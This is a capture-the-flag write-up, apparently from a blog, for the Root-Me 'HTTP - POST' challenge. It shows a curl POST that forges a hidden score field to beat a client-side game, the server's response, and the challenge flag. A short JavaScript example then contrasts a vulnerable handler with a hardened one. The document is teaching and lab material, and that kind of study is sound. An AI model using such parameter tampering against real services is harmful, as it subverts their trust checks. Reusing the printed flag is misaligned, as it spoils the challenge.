
HTTP - POST

Statement

Find a way to beat the top score!

Solution

curl http://challenge01.root-me.org/web-serveur/ch56/
<!DOCTYPE html>
<html>
    <head>
        <title>HTTP Basics</title>
    </head>

   <body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
        <h1>RandGame</h1>
        <h2>Human vs. Machine</h2>
        <hr>
        <p>Here is my new game. It's not totally finished but I'm sure nobody can beat me! ;)</p>
        <ul>
            <li>Rules: click on the button to hope to generate a great score</li>
            <li>Score to beat: <strong>999999</strong></li>
        </ul>


        <form action="" method="post" onsubmit="document.getElementsByName('score')[0].value = Math.floor(Math.random() * 1000001)">
            <input type="hidden" name="score" value="-1" />
            <input type="submit" name="generate" value="Give a try!">
        </form>
    </body>
</html>

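Let’s make a payload: the score is set in the browser by the form's onsubmit handler and sent in the hidden score field, so we can POST our own value directly.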

curl -X POST --data "score=99999999999992&generate=Give+a+try%21" http://challenge01.root-me.org/web-serveur/ch56/
<!DOCTYPE html>
<html>
    <head>
        <title>HTTP Basics</title>
    </head>

   <body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
        <h1>RandGame</h1>
        <h2>Human vs. Machine</h2>
        <hr>
        <p>Here is my new game. It's not totally finished but I'm sure nobody can beat me! ;)</p>
        <ul>
            <li>Rules: click on the button to hope to generate a great score</li>
            <li>Score to beat: <strong>999999</strong></li>
        </ul>

        <p>Wow, 99999999999992! How did you do that? :o</p><p>Flag to validate the challenge: <strong>H7tp_h4s_N0_s3Cr37S_F0r_y0U
</strong></p>
        <form action="" method="post" onsubmit="document.getElementsByName('score')[0].value = Math.floor(Math.random() * 1000001)">
            <input type="hidden" name="score" value="-1" />
            <input type="submit" name="generate" value="Give a try!">
        </form>
    </body>
</html>

The flag is

H7tp_h4s_N0_s3Cr37S_F0r_y0U
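
Why this works, and the fix, as an added example that is not the challenge's own server code: the handler names, `TOP_SCORE` and the response shape are assumptions made for illustration. The weak handler trusts the hidden `score` field; the corrected one moves the page's own `Math.random()` draw to the server and never reads the client's value.

```javascript
// Added example: hypothetical server-side handlers, not the challenge's real code.
const TOP_SCORE = 999999;

// Constructed sample: the form body sent by the curl command in the write-up.
const SAMPLE_BODY = 'score=99999999999992&generate=Give+a+try%21';

// Decode an application/x-www-form-urlencoded body into a plain object.
function parseForm(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Weak: the score comes from the hidden field, which the client fully controls.
function handleVulnerable(body) {
  const score = Number(parseForm(body).score);
  return { score, win: score > TOP_SCORE };
}

// Corrected: the draw happens on the server; the client's "score" is never read.
// rng is injectable so the behaviour can be checked deterministically.
function handleHardened(body, rng = () => Math.floor(Math.random() * 1000001)) {
  const form = parseForm(body);
  if (!('generate' in form)) return { score: null, win: false };
  const score = rng();
  return { score, win: score > TOP_SCORE, clientScoreIgnored: 'score' in form };
}

console.log(handleVulnerable(SAMPLE_BODY));
console.log(handleHardened(SAMPLE_BODY));
```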
This post is licensed under CC BY 4.0 by the author.